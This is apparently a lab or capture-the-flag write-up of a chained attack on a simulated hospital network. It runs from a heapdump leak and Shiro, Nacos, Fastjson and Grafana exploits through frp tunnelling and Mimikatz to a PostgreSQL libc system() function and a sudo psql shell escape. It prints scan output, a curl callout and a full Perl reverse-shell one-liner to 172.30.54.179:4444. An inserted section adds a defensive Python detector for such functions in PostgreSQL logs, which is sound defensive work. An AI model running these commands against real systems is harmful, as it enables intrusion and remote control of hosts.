Hospital

Logged in as admin with a weak password, but found nothing exploitable there.

Scanning showed a heapdump endpoint exists; downloaded it.

Ran JDumpSpider against the heap dump and found a Shiro vulnerability.

Injected an in-memory webshell.

SUID enumeration turned up vim.basic.

Originally wanted to write to /etc/passwd, but the vim.basic command in Behinder (冰蝎) would not load no matter how long I waited, so I settled for reading the flag directly.

Scanned the internal network:

```
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.6:8848 open
172.30.12.6:445 open
172.30.12.236:8009 open
172.30.12.5:22 open
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=05EEB15060E852B3E26D7F2B2A5E641C
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=05EEB15060E852B3E26D7F2B2A5E641C code:200 len:2005 title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
```

Status of the hosts so far:

- 172.30.12.5: owned
- 172.30.12.6: WORKGROUP\SERVER02
- 172.30.12.236

Successfully logged in to http://172.30.12.6:8848/nacos/#/ with the Nacos default credentials.

Found database credentials there, but Navicat could not log in; also found a Redis service, but redis-cli could not connect.

Used a Nacos exploit tool to inject an in-memory webshell.

Created a new user.

Dumped hashes with Mimikatz (猕猴桃), but this machine is in a workgroup, so no domain-user hashes could be obtained; still had to go in through 236:8080.

Intercepting the traffic showed the requests are sent as JSON; suspected Fastjson and tested it.

Sure enough.

Damn, the fastjsonscan plugin in the ONEFOX toolbox is broken; it took me two hours to realise the problem was the jar it ships with. Then I downloaded a fresh fastjsonscan from the internet and that new plugin could not detect the vulnerability either. The plugin from fushuling's article worked right away.

Since we had root privileges, wrote an SSH public key directly.

web3 has no outbound internet access, so tools were transferred via web1.

Enumeration showed two network interfaces.

The proxy set up on web1 is not on the same subnet as this one, so it cannot reach it.

Ran frps on web1 and frpc on web3.

Reached it successfully; the target has CVE-2021-43798 (Grafana arbitrary file read).

Used CVE-2021-43798 to retrieve the database file, and the grafanaExp tool recovered the database password: Postgres@123.

Changed the root user's password.

```sql
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('curl 172.30.54.179');
```
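
The `CREATE FUNCTION ... libc.so.6` statement above only works because the database role is a superuser, which is why an application's database role should never be one and why DDL should be logged. As an added example that is not part of this writeup, here is a detector over constructed PostgreSQL statement-log lines: it assumes `log_statement = 'all'` or `'ddl'`, a `log_line_prefix` like the one in the sample, and a trusted-library prefix list you adapt to the host; it flags C-language functions whose shared object lives outside `$libdir` and any later call to them.

```python
import re

# Constructed PostgreSQL statement-log lines (assumes log_statement = 'all' or
# 'ddl' and a "%t [%p] %u@%d " log_line_prefix); they are not the writeup's logs.
SAMPLE_LOG = """\
2026-03-18 21:19:40 UTC [2311] root@hospital LOG:  statement: SELECT id, ward FROM patients WHERE ward = 'B2';
2026-03-18 21:20:01 UTC [2311] root@hospital LOG:  statement: CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
2026-03-18 21:20:25 UTC [2311] root@hospital LOG:  statement: select system('curl 172.30.54.179');
2026-03-18 21:21:03 UTC [2312] app@hospital LOG:  statement: CREATE FUNCTION hstore_in(cstring) RETURNS hstore AS '$libdir/hstore' LANGUAGE C;
"""

STATEMENT = re.compile(r"LOG:\s+statement:\s+(?P<sql>.*)$")
# CREATE [OR REPLACE] FUNCTION <name> ... AS '<library>'[, '<symbol>'] ... LANGUAGE c
CREATE_C_FUNC = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[\w.\"]+).*?"
    r"\bAS\s+'(?P<lib>[^']+)'(?:\s*,\s*'(?P<sym>[^']+)')?.*?"
    r"\bLANGUAGE\s+'?c'?(?!\w)",
    re.IGNORECASE | re.DOTALL,
)
# Extension .so files normally live under $libdir (pg_config --pkglibdir); the prefix list is an assumption.
TRUSTED_LIB_PREFIXES = ("$libdir/", "/usr/lib/postgresql/")

def is_trusted_library(lib: str) -> bool:
    return lib.startswith(TRUSTED_LIB_PREFIXES)

def scan_postgres_log(text: str) -> list:
    """Flag C functions backed by a library outside $libdir, and later calls to them."""
    alerts, suspicious = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        m = STATEMENT.search(line)
        if not m:
            continue
        sql = m.group("sql")
        c = CREATE_C_FUNC.search(sql)
        if c and not is_trusted_library(c.group("lib")):
            name = c.group("name").strip('"').lower()
            suspicious.add(name)
            alerts.append({"line": lineno, "kind": "untrusted_c_function",
                           "function": name, "library": c.group("lib"),
                           "symbol": c.group("sym")})
            continue
        for name in suspicious:  # any call of a function defined the suspicious way
            if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.IGNORECASE):
                alerts.append({"line": lineno, "kind": "untrusted_function_call",
                               "function": name, "library": None, "symbol": None})
    return alerts

if __name__ == "__main__":
    print(*scan_postgres_log(SAMPLE_LOG), sep="\n")
```

The `$libdir/hstore` definition in the sample is left alone, so a legitimate extension install does not page anyone.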

```sql
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
```

Not enough privileges; need to escalate.

`sudo -l` shows the psql command is allowed.

Ran `python3 -c 'import pty;pty.spawn("/bin/bash")'` to get an interactive shell.

Escalated with `sudo /usr/local/postgresql/bin/psql`; the root password here is the one just changed, 123456.

Then `\!/bin/bash` (psql's shell escape).

Then just cat the flag.

About this Post

This post is written by DashingBug, licensed under CC BY-NC 4.0.